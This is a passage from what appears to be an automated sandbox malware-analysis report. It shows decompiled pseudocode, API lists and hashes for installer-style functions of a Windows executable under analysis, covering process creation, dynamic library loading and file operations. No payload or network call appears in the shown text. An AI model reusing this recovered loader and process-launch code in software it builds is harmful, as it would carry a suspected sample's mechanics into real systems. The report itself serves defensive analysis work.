				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42920c =  *0x42920c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0);
					}
				}
				return 0;
			}











                                  0x0040138a
                                  0x004013fa
                                  0x0040139b
                                  0x004013a0
                                  0x00000000
                                  0x00000000
                                  0x004013a2
                                  0x004013a3
                                  0x004013ad
                                  0x00000000
                                  0x00401404
                                  0x004013b0
                                  0x004013b7
                                  0x004013bd
                                  0x004013be
                                  0x004013c0
                                  0x004013c2
                                  0x004013b9
                                  0x004013b9
                                  0x004013ba
                                  0x004013ba
                                  0x004013c9
                                  0x004013cb
                                  0x004013f4
                                  0x004013f4
                                  0x004013c9
                                  0x00000000

                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                  • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                  • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                  • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405AEA(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426710->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426710,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                  0x00405af3
                                  0x00405b13
                                  0x00405b1b
                                  0x00405b20
                                  0x00000000
                                  0x00405b26
                                  0x00405b2a

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3712363035-0
                                  • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                  • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                  • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                  • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004068D4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406864(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                  0x004068dc
                                  0x004068df
                                  0x004068e6
                                  0x004068ee
                                  0x004068fa
                                  0x00000000
                                  0x00406901
                                  0x004068f1
                                  0x004068f8
                                  0x00000000
                                  0x00406909
                                  0x00000000

                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                    • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                    • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                    • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                  • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                  • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                  • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                  0x00405ffb
                                  0x00406008
                                  0x0040601d
                                  0x00406023

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405FD2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                  0x00405fd7
                                  0x00405fdd
                                  0x00405fe2
                                  0x00405feb
                                  0x00405feb
                                  0x00405ff4

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                  • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                  • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403ADC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403ADC() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403B21();
				_t3 = E00405C13(_t6, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsz176C.tmp\\", 7); // executed
				return _t3;
			}






                                  0x00403adc
                                  0x00403ae4
                                  0x00403ae7
                                  0x00403aed
                                  0x00403aed
                                  0x00403aed
                                  0x00403af4
                                  0x00403b00
                                  0x00403b05

                                  APIs
                                  • CloseHandle.KERNEL32(FFFFFFFF,00403A28,?), ref: 00403AE7
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsz176C.tmp\, xrefs: 00403AFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz176C.tmp\
                                  • API String ID: 2962429428-4019556525
                                  • Opcode ID: ea98741a50f28c62fa16d60caa101c986c2838e233e377089e9036697fda9458
                                  • Instruction ID: d4db8dbaf33ff22f2ff991163c220eb3cd6c997f56162562831ac65c0e81f35c
                                  • Opcode Fuzzy Hash: ea98741a50f28c62fa16d60caa101c986c2838e233e377089e9036697fda9458
                                  • Instruction Fuzzy Hash: 15C01230504B0056D574AFB99E4FA053A649B4573DB600729B0F8B40F1CF7C5699995D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405AB5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                  0x00405abb
                                  0x00405ac3
                                  0x00000000
                                  0x00405ac9
                                  0x00000000

                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                  • GetLastError.KERNEL32 ref: 00405AC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                  • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                  • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040607A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                  0x0040607e
                                  0x0040608e
                                  0x00406096
                                  0x00000000
                                  0x0040609d
                                  0x00000000
                                  0x0040609f

                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                  • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                  • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004060A9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                  0x004060ad
                                  0x004060bd
                                  0x004060c5
                                  0x00000000
                                  0x004060cc
                                  0x00000000
                                  0x004060ce

                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                  • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                  • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004034AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                  0x004034bd
                                  0x004034c3

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E00405569(0xffffffeb, _t7);
				_t9 = E00405AEA(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E0040697F(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                  0x00401faa
                                  0x00401faf
                                  0x00401fb5
                                  0x00401fba
                                  0x00401fbe
                                  0x0040292e
                                  0x00401fc4
                                  0x00401fc7
                                  0x00401fca
                                  0x00401fd2
                                  0x00401fe1
                                  0x00401fe3
                                  0x00401fe3
                                  0x00401fd4
                                  0x00401fd8
                                  0x00401fd8
                                  0x00401fd2
                                  0x00401fea
                                  0x00401feb
                                  0x00401feb
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
